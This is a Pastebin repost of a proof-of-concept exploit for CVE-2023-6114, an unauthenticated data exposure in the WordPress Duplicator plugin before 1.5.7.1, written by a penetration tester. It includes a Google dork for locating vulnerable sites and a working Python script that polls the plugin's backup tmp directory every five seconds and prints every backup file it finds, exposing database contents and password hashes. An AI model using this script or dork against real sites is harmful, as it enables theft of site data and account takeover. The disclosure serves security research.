Advertisement
FlyFar

WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover

Mar 12th, 2024
982
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.27 KB | Cybersecurity | 0 0
  1. # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -
  2. Unauthenticated Sensitive Data Exposure to Account Takeover
  3. # Google Dork: inurl:("plugins/duplicator/")
  4. # Date: 2023-12-04
  5. # Exploit Author: Dmitrii Ignatyev
  6. # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
  7. # Software Link: https://wordpress.org/plugins/duplicator/
  8. # Version: 1.5.7.1
  9. # Tested on: WordPress 6.4
  10. # CVE : CVE-2023-6114# CVE-Link:https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
  11.  
  12. # CVE-Link: https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A
  13. severe vulnerability has been discovered in the directory
  14. */wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
  15. exposes extensive information about the site, including its
  16. configuration, directories, and files, but more critically, it
  17. provides unauthorized access to sensitive data within the database and
  18. all data inside. Exploiting this vulnerability poses an imminent
  19. threat, leading to potential *brute force attacks on password hashes
  20. and, subsequently, the compromise of the entire system*.*
  21. POC*:
  22.  
  23. 1) It is necessary that either the administrator or auto-backup works
  24. automatically at the scheduled time
  25.  
  26. 2) Exploit will send file search requests every 5 seconds
  27.  
  28. 3) I attack the site with this vulnerability using an exploit
  29.  
  30. Exploit sends a request to the server every 5 seconds along the path
  31. “*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
  32. <http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if
  33. it finds something in the index of, it instantly parses all the data
  34. and displays it on the screen
  35.  
  36. Exploit (python3):
  37.  
  38. import requests
  39. from bs4 import BeautifulSoup
  40. import re
  41. import time
  42.  
  43. url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
  44. processed_files = set()
  45.  
  46. def get_file_names(url):
  47.     response = requests.get(url)
  48.  
  49.     if response.status_code == 200 and len(response.text) > 0:
  50.         soup = BeautifulSoup(response.text, 'html.parser')
  51.         links = soup.find_all('a')
  52.  
  53.         file_names = []
  54.         for link in links:
  55.             file_name = link.get('href')
  56.             if file_name != "../" and not file_name.startswith("?"):
  57.                 file_names.append(file_name)
  58.  
  59.         return file_names
  60.     return []
  61.  
  62. def get_file_content(url, file_name):
  63.     file_url = url + file_name
  64.  
  65.  
  66.     if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
  67.         print(f"Ignoring file: {file_name}")
  68.         return None
  69.  
  70.     file_response = requests.get(file_url)
  71.  
  72.     if file_response.status_code == 200:
  73.         return file_response.text
  74.     return None
  75.  
  76. while True:
  77.     file_names = get_file_names(url)
  78.  
  79.     if file_names:
  80.         print("File names on the page:")
  81.         for file_name in file_names:
  82.             if file_name not in processed_files:
  83.                 print(file_name)
  84.                 file_content = get_file_content(url, file_name)
  85.  
  86.                 if file_content is not None:
  87.                     print("File content:")
  88.                     print(file_content)
  89.                     processed_files.add(file_name)
  90.  
  91.     time.sleep(5)
  92.  
  93.  
  94.  
  95. --
  96. With best regards,
  97. Dmitrii Ignatyev, Penetration Tester
  98.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement